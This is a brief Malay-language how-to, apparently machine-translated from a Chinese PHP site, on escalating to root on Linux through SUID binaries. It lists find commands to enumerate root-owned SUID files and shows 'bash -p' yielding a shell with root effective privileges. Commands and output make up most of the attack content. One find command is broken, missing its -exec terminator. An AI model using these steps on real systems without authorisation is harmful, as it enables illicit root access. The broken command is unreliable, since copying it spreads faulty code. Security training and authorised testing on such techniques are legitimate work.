Cara menggunakan SUID untuk meningkatkan keistimewaan di bawah Linux

SUID ialah mekanisme kebenaran dalam Linux Apabila fail dengan kebenaran ini dilaksanakan, pemanggil akan mendapatkan kebenaran pemilik fail buat sementara waktu. Jika anda mempunyai kebenaran SUID, anda boleh menggunakan binari dan alatan dalam sistem untuk melakukan peningkatan keistimewaan root.

Arahan berikut boleh menemui semua fail boleh laku SUID yang dijalankan pada sistem. Khususnya, arahan akan cuba mencari fail dengan SUID yang mempunyai keizinan root.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

Semua binari di atas akan dilaksanakan dengan hak pengguna root kerana kebenarannya Mengandungi "s" dan sepadan dengan kebenaran root.

Bash

Arahan berikut akan membuka shell bash dengan keistimewaan root.

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Atas ialah kandungan terperinci Cara menggunakan SUID untuk meningkatkan keistimewaan di bawah Linux. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!